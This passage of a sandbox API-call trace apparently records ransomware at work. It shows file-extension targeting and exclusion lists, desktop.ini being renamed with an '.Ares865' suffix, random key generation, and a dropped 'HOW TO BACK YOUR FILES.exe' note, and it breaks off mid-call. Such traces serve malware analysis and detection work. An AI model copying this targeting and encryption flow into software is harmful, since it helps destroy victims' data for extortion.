1 [0092.150] lstrlenW (lpString="fic") returned 3 [0092.151] lstrcmpiW (lpString1="ini", lpString2="fic") returned 1 [0092.151] lstrlenW (lpString="flexolibrary") returned 12 [0092.151] lstrlenW (lpString="fm5") returned 3 [0092.151] lstrcmpiW (lpString1="ini", lpString2="fm5") returned 1 [0092.151] lstrlenW (lpString="fmp") returned 3 [0092.151] lstrcmpiW (lpString1="ini", lpString2="fmp") returned 1 [0092.151] lstrlenW (lpString="fmp12") returned 5 [0092.151] lstrcmpiW (lpString1="p.ini", lpString2="fmp12") returned 1 [0092.151] lstrlenW (lpString="fmpsl") returned 5 [0092.151] lstrcmpiW (lpString1="p.ini", lpString2="fmpsl") returned 1 [0092.151] lstrlenW (lpString="fol") returned 3 [0092.151] lstrcmpiW (lpString1="ini", lpString2="fol") returned 1 [0092.151] lstrlenW (lpString="fp3") returned 3 [0092.151] lstrcmpiW (lpString1="ini", lpString2="fp3") returned 1 [0092.151] lstrlenW (lpString="fp4") returned 3 [0092.151] lstrcmpiW (lpString1="ini", lpString2="fp4") returned 1 [0092.151] lstrlenW (lpString="fp5") returned 3 [0092.151] lstrcmpiW (lpString1="ini", lpString2="fp5") returned 1 [0092.151] lstrlenW (lpString="fp7") returned 3 [0092.151] lstrcmpiW (lpString1="ini", lpString2="fp7") returned 1 [0092.151] lstrlenW (lpString="fpt") returned 3 [0092.151] lstrcmpiW (lpString1="ini", lpString2="fpt") returned 1 [0092.151] lstrlenW (lpString="frm") returned 3 [0092.151] lstrcmpiW (lpString1="ini", lpString2="frm") returned 1 [0092.151] lstrlenW (lpString="gdb") returned 3 [0092.151] lstrcmpiW (lpString1="ini", lpString2="gdb") returned 1 [0092.151] lstrlenW (lpString="gdb") returned 3 [0092.151] lstrcmpiW (lpString1="ini", lpString2="gdb") returned 1 [0092.151] lstrlenW (lpString="grdb") returned 4 [0092.151] lstrcmpiW (lpString1=".ini", lpString2="grdb") returned -1 [0092.151] lstrlenW (lpString="gwi") returned 3 [0092.151] lstrcmpiW (lpString1="ini", lpString2="gwi") returned 1 [0092.151] lstrlenW (lpString="hdb") returned 3 [0092.151] lstrcmpiW (lpString1="ini", lpString2="hdb") returned 1 [0092.151] lstrlenW (lpString="his") returned 3 [0092.151] lstrcmpiW (lpString1="ini", lpString2="his") returned 1 [0092.151] lstrlenW (lpString="ib") returned 2 [0092.151] lstrcmpiW (lpString1="ni", lpString2="ib") returned 1 [0092.152] lstrlenW (lpString="idb") returned 3 [0092.152] lstrcmpiW (lpString1="ini", lpString2="idb") returned 1 [0092.152] lstrlenW (lpString="ihx") returned 3 [0092.152] lstrcmpiW (lpString1="ini", lpString2="ihx") returned 1 [0092.152] lstrlenW (lpString="itdb") returned 4 [0092.152] lstrcmpiW (lpString1=".ini", lpString2="itdb") returned -1 [0092.152] lstrlenW (lpString="itw") returned 3 [0092.152] lstrcmpiW (lpString1="ini", lpString2="itw") returned -1 [0092.152] lstrlenW (lpString="jet") returned 3 [0092.152] lstrcmpiW (lpString1="ini", lpString2="jet") returned -1 [0092.152] lstrlenW (lpString="jtx") returned 3 [0092.152] lstrcmpiW (lpString1="ini", lpString2="jtx") returned -1 [0092.152] lstrlenW (lpString="kdb") returned 3 [0092.152] lstrcmpiW (lpString1="ini", lpString2="kdb") returned -1 [0092.152] lstrlenW (lpString="kexi") returned 4 [0092.152] lstrcmpiW (lpString1=".ini", lpString2="kexi") returned -1 [0092.152] lstrlenW (lpString="kexic") returned 5 [0092.152] lstrcmpiW (lpString1="p.ini", lpString2="kexic") returned 1 [0092.152] lstrlenW (lpString="kexis") returned 5 [0092.152] lstrcmpiW (lpString1="p.ini", lpString2="kexis") returned 1 [0092.152] lstrlenW (lpString="lgc") returned 3 [0092.152] lstrcmpiW (lpString1="ini", lpString2="lgc") returned -1 [0092.152] lstrlenW (lpString="lwx") returned 3 [0092.152] lstrcmpiW (lpString1="ini", lpString2="lwx") returned -1 [0092.152] lstrlenW (lpString="maf") returned 3 [0092.152] lstrcmpiW (lpString1="ini", lpString2="maf") returned -1 [0092.152] lstrlenW (lpString="maq") returned 3 [0092.152] lstrcmpiW (lpString1="ini", lpString2="maq") returned -1 [0092.152] lstrlenW (lpString="mar") returned 3 [0092.152] lstrcmpiW (lpString1="ini", lpString2="mar") returned -1 [0092.152] lstrlenW (lpString="marshal") returned 7 [0092.152] lstrcmpiW (lpString1="top.ini", lpString2="marshal") returned 1 [0092.152] lstrlenW (lpString="mas") returned 3 [0092.152] lstrcmpiW (lpString1="ini", lpString2="mas") returned -1 [0092.152] lstrlenW (lpString="mav") returned 3 [0092.152] lstrcmpiW (lpString1="ini", lpString2="mav") returned -1 [0092.152] lstrlenW (lpString="maw") returned 3 [0092.152] lstrcmpiW (lpString1="ini", lpString2="maw") returned -1 [0092.153] lstrlenW (lpString="mdbhtml") returned 7 [0092.153] lstrcmpiW (lpString1="top.ini", lpString2="mdbhtml") returned 1 [0092.153] lstrlenW (lpString="mdn") returned 3 [0092.153] lstrcmpiW (lpString1="ini", lpString2="mdn") returned -1 [0092.153] lstrlenW (lpString="mdt") returned 3 [0092.153] lstrcmpiW (lpString1="ini", lpString2="mdt") returned -1 [0092.153] lstrlenW (lpString="mfd") returned 3 [0092.153] lstrcmpiW (lpString1="ini", lpString2="mfd") returned -1 [0092.153] lstrlenW (lpString="mpd") returned 3 [0092.153] lstrcmpiW (lpString1="ini", lpString2="mpd") returned -1 [0092.153] lstrlenW (lpString="mrg") returned 3 [0092.153] lstrcmpiW (lpString1="ini", lpString2="mrg") returned -1 [0092.153] lstrlenW (lpString="mud") returned 3 [0092.153] lstrcmpiW (lpString1="ini", lpString2="mud") returned -1 [0092.153] lstrlenW (lpString="mwb") returned 3 [0092.153] lstrcmpiW (lpString1="ini", lpString2="mwb") returned -1 [0092.153] lstrlenW (lpString="myd") returned 3 [0092.153] lstrcmpiW (lpString1="ini", lpString2="myd") returned -1 [0092.153] lstrlenW (lpString="ndf") returned 3 [0092.153] lstrcmpiW (lpString1="ini", lpString2="ndf") returned -1 [0092.153] lstrlenW (lpString="nnt") returned 3 [0092.153] lstrcmpiW (lpString1="ini", lpString2="nnt") returned -1 [0092.153] lstrlenW (lpString="nrmlib") returned 6 [0092.153] lstrcmpiW (lpString1="op.ini", lpString2="nrmlib") returned 1 [0092.153] lstrlenW (lpString="ns2") returned 3 [0092.153] lstrcmpiW (lpString1="ini", lpString2="ns2") returned -1 [0092.153] lstrlenW (lpString="ns3") returned 3 [0092.153] lstrcmpiW (lpString1="ini", lpString2="ns3") returned -1 [0092.153] lstrlenW (lpString="ns4") returned 3 [0092.153] lstrcmpiW (lpString1="ini", lpString2="ns4") returned -1 [0092.153] lstrlenW (lpString="nsf") returned 3 [0092.153] lstrcmpiW (lpString1="ini", lpString2="nsf") returned -1 [0092.153] lstrlenW (lpString="nv") returned 2 [0092.153] lstrcmpiW (lpString1="ni", lpString2="nv") returned -1 [0092.153] lstrlenW (lpString="nv2") returned 3 [0092.153] lstrcmpiW (lpString1="ini", lpString2="nv2") returned -1 [0092.153] lstrlenW (lpString="nwdb") returned 4 [0092.153] lstrcmpiW (lpString1=".ini", lpString2="nwdb") returned -1 [0092.153] lstrlenW (lpString="nyf") returned 3 [0092.154] lstrcmpiW (lpString1="ini", lpString2="nyf") returned -1 [0092.154] lstrlenW (lpString="odb") returned 3 [0092.154] lstrcmpiW (lpString1="ini", lpString2="odb") returned -1 [0092.154] lstrlenW (lpString="odb") returned 3 [0092.154] lstrcmpiW (lpString1="ini", lpString2="odb") returned -1 [0092.154] lstrlenW (lpString="oqy") returned 3 [0092.154] lstrcmpiW (lpString1="ini", lpString2="oqy") returned -1 [0092.154] lstrlenW (lpString="ora") returned 3 [0092.154] lstrcmpiW (lpString1="ini", lpString2="ora") returned -1 [0092.154] lstrlenW (lpString="orx") returned 3 [0092.154] lstrcmpiW (lpString1="ini", lpString2="orx") returned -1 [0092.154] lstrlenW (lpString="owc") returned 3 [0092.154] lstrcmpiW (lpString1="ini", lpString2="owc") returned -1 [0092.154] lstrlenW (lpString="p96") returned 3 [0092.154] lstrcmpiW (lpString1="ini", lpString2="p96") returned -1 [0092.154] lstrlenW (lpString="p97") returned 3 [0092.154] lstrcmpiW (lpString1="ini", lpString2="p97") returned -1 [0092.154] lstrlenW (lpString="pan") returned 3 [0092.154] lstrcmpiW (lpString1="ini", lpString2="pan") returned -1 [0092.154] lstrlenW (lpString="pdb") returned 3 [0092.154] lstrcmpiW (lpString1="ini", lpString2="pdb") returned -1 [0092.154] lstrlenW (lpString="pdm") returned 3 [0092.154] lstrcmpiW (lpString1="ini", lpString2="pdm") returned -1 [0092.154] lstrlenW (lpString="pnz") returned 3 [0092.154] lstrcmpiW (lpString1="ini", lpString2="pnz") returned -1 [0092.154] lstrlenW (lpString="qry") returned 3 [0092.154] lstrcmpiW (lpString1="ini", lpString2="qry") returned -1 [0092.154] lstrlenW (lpString="qvd") returned 3 [0092.154] lstrcmpiW (lpString1="ini", lpString2="qvd") returned -1 [0092.154] lstrlenW (lpString="rbf") returned 3 [0092.154] lstrcmpiW (lpString1="ini", lpString2="rbf") returned -1 [0092.154] lstrlenW (lpString="rctd") returned 4 [0092.154] lstrcmpiW (lpString1=".ini", lpString2="rctd") returned -1 [0092.154] lstrlenW (lpString="rod") returned 3 [0092.154] lstrcmpiW (lpString1="ini", lpString2="rod") returned -1 [0092.154] lstrlenW (lpString="rodx") returned 4 [0092.154] lstrcmpiW (lpString1=".ini", lpString2="rodx") returned -1 [0092.154] lstrlenW (lpString="rpd") returned 3 [0092.154] lstrcmpiW (lpString1="ini", lpString2="rpd") returned -1 [0092.155] lstrlenW (lpString="rsd") returned 3 [0092.155] lstrcmpiW (lpString1="ini", lpString2="rsd") returned -1 [0092.155] lstrlenW (lpString="sas7bdat") returned 8 [0092.155] lstrcmpiW (lpString1="ktop.ini", lpString2="sas7bdat") returned -1 [0092.155] lstrlenW (lpString="sbf") returned 3 [0092.155] lstrcmpiW (lpString1="ini", lpString2="sbf") returned -1 [0092.155] lstrlenW (lpString="scx") returned 3 [0092.155] lstrcmpiW (lpString1="ini", lpString2="scx") returned -1 [0092.155] lstrlenW (lpString="sdb") returned 3 [0092.155] lstrcmpiW (lpString1="ini", lpString2="sdb") returned -1 [0092.155] lstrlenW (lpString="sdc") returned 3 [0092.155] lstrcmpiW (lpString1="ini", lpString2="sdc") returned -1 [0092.155] lstrlenW (lpString="sdf") returned 3 [0092.155] lstrcmpiW (lpString1="ini", lpString2="sdf") returned -1 [0092.155] lstrlenW (lpString="sis") returned 3 [0092.155] lstrcmpiW (lpString1="ini", lpString2="sis") returned -1 [0092.155] lstrlenW (lpString="spq") returned 3 [0092.155] lstrcmpiW (lpString1="ini", lpString2="spq") returned -1 [0092.155] lstrlenW (lpString="te") returned 2 [0092.155] lstrcmpiW (lpString1="ni", lpString2="te") returned -1 [0092.155] lstrlenW (lpString="teacher") returned 7 [0092.155] lstrcmpiW (lpString1="top.ini", lpString2="teacher") returned 1 [0092.155] lstrlenW (lpString="tmd") returned 3 [0092.155] lstrcmpiW (lpString1="ini", lpString2="tmd") returned -1 [0092.155] lstrlenW (lpString="tps") returned 3 [0092.155] lstrcmpiW (lpString1="ini", lpString2="tps") returned -1 [0092.155] lstrlenW (lpString="trc") returned 3 [0092.155] lstrcmpiW (lpString1="ini", lpString2="trc") returned -1 [0092.155] lstrlenW (lpString="trc") returned 3 [0092.155] lstrcmpiW (lpString1="ini", lpString2="trc") returned -1 [0092.155] lstrlenW (lpString="trm") returned 3 [0092.155] lstrcmpiW (lpString1="ini", lpString2="trm") returned -1 [0092.155] lstrlenW (lpString="udb") returned 3 [0092.155] lstrcmpiW (lpString1="ini", lpString2="udb") returned -1 [0092.155] lstrlenW (lpString="udl") returned 3 [0092.155] lstrcmpiW (lpString1="ini", lpString2="udl") returned -1 [0092.155] lstrlenW (lpString="usr") returned 3 [0092.155] lstrcmpiW (lpString1="ini", lpString2="usr") returned -1 [0092.156] lstrlenW (lpString="v12") returned 3 [0092.156] lstrcmpiW (lpString1="ini", lpString2="v12") returned -1 [0092.156] lstrlenW (lpString="vis") returned 3 [0092.156] lstrcmpiW (lpString1="ini", lpString2="vis") returned -1 [0092.156] lstrlenW (lpString="vpd") returned 3 [0092.156] lstrcmpiW (lpString1="ini", lpString2="vpd") returned -1 [0092.156] lstrlenW (lpString="vvv") returned 3 [0092.156] lstrcmpiW (lpString1="ini", lpString2="vvv") returned -1 [0092.156] lstrlenW (lpString="wdb") returned 3 [0092.156] lstrcmpiW (lpString1="ini", lpString2="wdb") returned -1 [0092.156] lstrlenW (lpString="wmdb") returned 4 [0092.156] lstrcmpiW (lpString1=".ini", lpString2="wmdb") returned -1 [0092.156] lstrlenW (lpString="wrk") returned 3 [0092.156] lstrcmpiW (lpString1="ini", lpString2="wrk") returned -1 [0092.156] lstrlenW (lpString="xdb") returned 3 [0092.156] lstrcmpiW (lpString1="ini", lpString2="xdb") returned -1 [0092.156] lstrlenW (lpString="xld") returned 3 [0092.156] lstrcmpiW (lpString1="ini", lpString2="xld") returned -1 [0092.156] lstrlenW (lpString="xmlff") returned 5 [0092.156] lstrcmpiW (lpString1="p.ini", lpString2="xmlff") returned -1 [0092.156] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Start Menu\\Programs\\desktop.ini.Ares865") returned 69 [0092.156] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Start Menu\\Programs\\desktop.ini" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\start menu\\programs\\desktop.ini"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Start Menu\\Programs\\desktop.ini.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\start menu\\programs\\desktop.ini.ares865"), dwFlags=0x1) returned 1 [0092.158] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Start Menu\\Programs\\desktop.ini.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\start menu\\programs\\desktop.ini.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0092.158] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=476) returned 1 [0092.158] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0092.158] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2ef0 [0092.158] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f0518 [0092.159] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0380) returned 1 [0092.159] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0092.159] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0092.159] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x4e0, lpName=0x0) returned 0x15c [0092.160] MapViewOfFile (hFileMappingObject=0x15c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x4e0) returned 0x190000 [0092.160] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0380) returned 1 [0092.161] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0092.161] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0092.161] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2f68 [0092.161] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2f68 | out: hHeap=0x2b0000) returned 1 [0092.161] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x100) returned 0x31afc8 [0092.161] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x32afc8 [0092.161] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x31afc8 | out: hHeap=0x2b0000) returned 1 [0092.161] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x32b0e0 [0092.161] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x208) returned 0x2d9d88 [0092.161] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x32b0e0 | out: hHeap=0x2b0000) returned 1 [0092.161] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d9d88 | out: hHeap=0x2b0000) returned 1 [0092.161] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x32afc8 | out: hHeap=0x2b0000) returned 1 [0092.162] UnmapViewOfFile (lpBaseAddress=0x190000) returned 1 [0092.162] CloseHandle (hObject=0x15c) returned 1 [0092.162] CloseHandle (hObject=0x118) returned 1 [0092.165] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2ef0 | out: hHeap=0x2b0000) returned 1 [0092.165] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f0518 | out: hHeap=0x2b0000) returned 1 [0092.165] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cd0020 | out: hHeap=0x2b0000) returned 1 [0092.165] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4d0c5c00, ftCreationTime.dwHighDateTime=0x1d56a3b, ftLastAccessTime.dwLowDateTime=0x4d0c5c00, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x48f29da0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x1dc00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HOW TO BACK YOUR FILES.exe", cAlternateFileName="HOWTOB~1.EXE")) returned 1 [0092.165] lstrcmpiW (lpString1="HOW TO BACK YOUR FILES.exe", lpString2="HOW TO BACK YOUR FILES.exe") returned 0 [0092.165] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d71a60, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d71a60, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d7ae880, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x58b, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Internet Explorer (64-bit).lnk", cAlternateFileName="INTERN~2.LNK")) returned 1 [0092.165] lstrcmpiW (lpString1="Internet Explorer (64-bit).lnk", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0092.165] lstrcmpiW (lpString1="Internet Explorer (64-bit).lnk", lpString2="aoldtz.exe") returned 1 [0092.165] lstrcmpiW (lpString1="Internet Explorer (64-bit).lnk", lpString2=".") returned 1 [0092.165] lstrcmpiW (lpString1="Internet Explorer (64-bit).lnk", lpString2="..") returned 1 [0092.165] lstrcmpiW (lpString1="Internet Explorer (64-bit).lnk", lpString2="windows") returned -1 [0092.165] lstrcmpiW (lpString1="Internet Explorer (64-bit).lnk", lpString2="bootmgr") returned 1 [0092.165] lstrcmpiW (lpString1="Internet Explorer (64-bit).lnk", lpString2="temp") returned -1 [0092.165] lstrcmpiW (lpString1="Internet Explorer (64-bit).lnk", lpString2="pagefile.sys") returned -1 [0092.165] lstrcmpiW (lpString1="Internet Explorer (64-bit).lnk", lpString2="boot") returned 1 [0092.165] lstrcmpiW (lpString1="Internet Explorer (64-bit).lnk", lpString2="ids.txt") returned 1 [0092.165] lstrcmpiW (lpString1="Internet Explorer (64-bit).lnk", lpString2="ntuser.dat") returned -1 [0092.165] lstrcmpiW (lpString1="Internet Explorer (64-bit).lnk", lpString2="perflogs") returned -1 [0092.166] lstrcmpiW (lpString1="Internet Explorer (64-bit).lnk", lpString2="MSBuild") returned -1 [0092.166] lstrlenW (lpString="Internet Explorer (64-bit).lnk") returned 30 [0092.166] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Start Menu\\Programs\\desktop.ini") returned 61 [0092.166] lstrcpyW (in: lpString1=0x2cce464, lpString2="Internet Explorer (64-bit).lnk" | out: lpString1="Internet Explorer (64-bit).lnk") returned="Internet Explorer (64-bit).lnk" [0092.166] lstrlenW (lpString="Internet Explorer (64-bit).lnk") returned 30 [0092.166] lstrlenW (lpString="Ares865") returned 7 [0092.166] lstrcmpiW (lpString1="it).lnk", lpString2="Ares865") returned 1 [0092.166] lstrlenW (lpString=".dll") returned 4 [0092.166] lstrcmpiW (lpString1="Internet Explorer (64-bit).lnk", lpString2=".dll") returned 1 [0092.166] lstrlenW (lpString=".lnk") returned 4 [0092.166] lstrcmpiW (lpString1="Internet Explorer (64-bit).lnk", lpString2=".lnk") returned 1 [0092.166] lstrlenW (lpString=".ini") returned 4 [0092.166] lstrcmpiW (lpString1="Internet Explorer (64-bit).lnk", lpString2=".ini") returned 1 [0092.166] lstrlenW (lpString=".sys") returned 4 [0092.166] lstrcmpiW (lpString1="Internet Explorer (64-bit).lnk", lpString2=".sys") returned 1 [0092.166] lstrlenW (lpString="Internet Explorer (64-bit).lnk") returned 30 [0092.166] lstrlenW (lpString="bak") returned 3 [0092.166] lstrcmpiW (lpString1="lnk", lpString2="bak") returned 1 [0092.166] lstrlenW (lpString="ba_") returned 3 [0092.166] lstrcmpiW (lpString1="lnk", lpString2="ba_") returned 1 [0092.166] lstrlenW (lpString="dbb") returned 3 [0092.166] lstrcmpiW (lpString1="lnk", lpString2="dbb") returned 1 [0092.166] lstrlenW (lpString="vmdk") returned 4 [0092.166] lstrcmpiW (lpString1=".lnk", lpString2="vmdk") returned -1 [0092.166] lstrlenW (lpString="rar") returned 3 [0092.166] lstrcmpiW (lpString1="lnk", lpString2="rar") returned -1 [0092.166] lstrlenW (lpString="zip") returned 3 [0092.166] lstrcmpiW (lpString1="lnk", lpString2="zip") returned -1 [0092.166] lstrlenW (lpString="tgz") returned 3 [0092.166] lstrcmpiW (lpString1="lnk", lpString2="tgz") returned -1 [0092.166] lstrlenW (lpString="vbox") returned 4 [0092.166] lstrcmpiW (lpString1=".lnk", lpString2="vbox") returned -1 [0092.166] lstrlenW (lpString="vdi") returned 3 [0092.166] lstrcmpiW (lpString1="lnk", lpString2="vdi") returned -1 [0092.166] lstrlenW (lpString="vhd") returned 3 [0092.166] lstrcmpiW (lpString1="lnk", lpString2="vhd") returned -1 [0092.166] lstrlenW (lpString="vhdx") returned 4 [0092.167] lstrcmpiW (lpString1=".lnk", lpString2="vhdx") returned -1 [0092.167] lstrlenW (lpString="avhd") returned 4 [0092.167] lstrcmpiW (lpString1=".lnk", lpString2="avhd") returned -1 [0092.167] lstrlenW (lpString="db") returned 2 [0092.167] lstrcmpiW (lpString1="nk", lpString2="db") returned 1 [0092.167] lstrlenW (lpString="db2") returned 3 [0092.167] lstrcmpiW (lpString1="lnk", lpString2="db2") returned 1 [0092.167] lstrlenW (lpString="db3") returned 3 [0092.167] lstrcmpiW (lpString1="lnk", lpString2="db3") returned 1 [0092.167] lstrlenW (lpString="dbf") returned 3 [0092.167] lstrcmpiW (lpString1="lnk", lpString2="dbf") returned 1 [0092.167] lstrlenW (lpString="mdf") returned 3 [0092.167] lstrcmpiW (lpString1="lnk", lpString2="mdf") returned -1 [0092.167] lstrlenW (lpString="mdb") returned 3 [0092.167] lstrcmpiW (lpString1="lnk", lpString2="mdb") returned -1 [0092.167] lstrlenW (lpString="sql") returned 3 [0092.167] lstrcmpiW (lpString1="lnk", lpString2="sql") returned -1 [0092.167] lstrlenW (lpString="sqlite") returned 6 [0092.167] lstrcmpiW (lpString1="t).lnk", lpString2="sqlite") returned 1 [0092.167] lstrlenW (lpString="sqlite3") returned 7 [0092.167] lstrcmpiW (lpString1="it).lnk", lpString2="sqlite3") returned -1 [0092.167] lstrlenW (lpString="sqlitedb") returned 8 [0092.167] lstrcmpiW (lpString1="bit).lnk", lpString2="sqlitedb") returned -1 [0092.167] lstrlenW (lpString="xml") returned 3 [0092.167] lstrcmpiW (lpString1="lnk", lpString2="xml") returned -1 [0092.167] lstrlenW (lpString="$er") returned 3 [0092.167] lstrcmpiW (lpString1="lnk", lpString2="$er") returned 1 [0092.167] lstrlenW (lpString="4dd") returned 3 [0092.167] lstrcmpiW (lpString1="lnk", lpString2="4dd") returned 1 [0092.167] lstrlenW (lpString="4dl") returned 3 [0092.167] lstrcmpiW (lpString1="lnk", lpString2="4dl") returned 1 [0092.167] lstrlenW (lpString="^^^") returned 3 [0092.167] lstrcmpiW (lpString1="lnk", lpString2="^^^") returned 1 [0092.167] lstrlenW (lpString="abs") returned 3 [0092.167] lstrcmpiW (lpString1="lnk", lpString2="abs") returned 1 [0092.167] lstrlenW (lpString="abx") returned 3 [0092.167] lstrcmpiW (lpString1="lnk", lpString2="abx") returned 1 [0092.167] lstrlenW (lpString="accdb") returned 5 [0092.168] lstrcmpiW (lpString1=").lnk", lpString2="accdb") returned -1 [0092.168] lstrlenW (lpString="accdc") returned 5 [0092.168] lstrcmpiW (lpString1=").lnk", lpString2="accdc") returned -1 [0092.168] lstrlenW (lpString="accde") returned 5 [0092.168] lstrcmpiW (lpString1=").lnk", lpString2="accde") returned -1 [0092.168] lstrlenW (lpString="accdr") returned 5 [0092.168] lstrcmpiW (lpString1=").lnk", lpString2="accdr") returned -1 [0092.168] lstrlenW (lpString="accdt") returned 5 [0092.168] lstrcmpiW (lpString1=").lnk", lpString2="accdt") returned -1 [0092.168] lstrlenW (lpString="accdw") returned 5 [0092.168] lstrcmpiW (lpString1=").lnk", lpString2="accdw") returned -1 [0092.168] lstrlenW (lpString="accft") returned 5 [0092.168] lstrcmpiW (lpString1=").lnk", lpString2="accft") returned -1 [0092.168] lstrlenW (lpString="adb") returned 3 [0092.168] lstrcmpiW (lpString1="lnk", lpString2="adb") returned 1 [0092.168] lstrlenW (lpString="adb") returned 3 [0092.168] lstrcmpiW (lpString1="lnk", lpString2="adb") returned 1 [0092.168] lstrlenW (lpString="ade") returned 3 [0092.168] lstrcmpiW (lpString1="lnk", lpString2="ade") returned 1 [0092.168] lstrlenW (lpString="adf") returned 3 [0092.168] lstrcmpiW (lpString1="lnk", lpString2="adf") returned 1 [0092.168] lstrlenW (lpString="adn") returned 3 [0092.168] lstrcmpiW (lpString1="lnk", lpString2="adn") returned 1 [0092.168] lstrlenW (lpString="adp") returned 3 [0092.168] lstrcmpiW (lpString1="lnk", lpString2="adp") returned 1 [0092.168] lstrlenW (lpString="alf") returned 3 [0092.168] lstrcmpiW (lpString1="lnk", lpString2="alf") returned 1 [0092.168] lstrlenW (lpString="ask") returned 3 [0092.168] lstrcmpiW (lpString1="lnk", lpString2="ask") returned 1 [0092.168] lstrlenW (lpString="btr") returned 3 [0092.168] lstrcmpiW (lpString1="lnk", lpString2="btr") returned 1 [0092.168] lstrlenW (lpString="cat") returned 3 [0092.168] lstrcmpiW (lpString1="lnk", lpString2="cat") returned 1 [0092.168] lstrlenW (lpString="cdb") returned 3 [0092.168] lstrcmpiW (lpString1="lnk", lpString2="cdb") returned 1 [0092.168] lstrlenW (lpString="ckp") returned 3 [0092.168] lstrcmpiW (lpString1="lnk", lpString2="ckp") returned 1 [0092.168] lstrlenW (lpString="cma") returned 3 [0092.168] lstrcmpiW (lpString1="lnk", lpString2="cma") returned 1 [0092.169] lstrlenW (lpString="cpd") returned 3 [0092.169] lstrcmpiW (lpString1="lnk", lpString2="cpd") returned 1 [0092.169] lstrlenW (lpString="dacpac") returned 6 [0092.169] lstrcmpiW (lpString1="t).lnk", lpString2="dacpac") returned 1 [0092.169] lstrlenW (lpString="dad") returned 3 [0092.169] lstrcmpiW (lpString1="lnk", lpString2="dad") returned 1 [0092.169] lstrlenW (lpString="dadiagrams") returned 10 [0092.169] lstrcmpiW (lpString1="4-bit).lnk", lpString2="dadiagrams") returned -1 [0092.169] lstrlenW (lpString="daschema") returned 8 [0092.169] lstrcmpiW (lpString1="bit).lnk", lpString2="daschema") returned -1 [0092.169] lstrlenW (lpString="db-journal") returned 10 [0092.169] lstrcmpiW (lpString1="4-bit).lnk", lpString2="db-journal") returned -1 [0092.169] lstrlenW (lpString="db-shm") returned 6 [0092.169] lstrcmpiW (lpString1="t).lnk", lpString2="db-shm") returned 1 [0092.169] lstrlenW (lpString="db-wal") returned 6 [0092.169] lstrcmpiW (lpString1="t).lnk", lpString2="db-wal") returned 1 [0092.169] lstrlenW (lpString="dbc") returned 3 [0092.169] lstrcmpiW (lpString1="lnk", lpString2="dbc") returned 1 [0092.169] lstrlenW (lpString="dbs") returned 3 [0092.169] lstrcmpiW (lpString1="lnk", lpString2="dbs") returned 1 [0092.169] lstrlenW (lpString="dbt") returned 3 [0092.169] lstrcmpiW 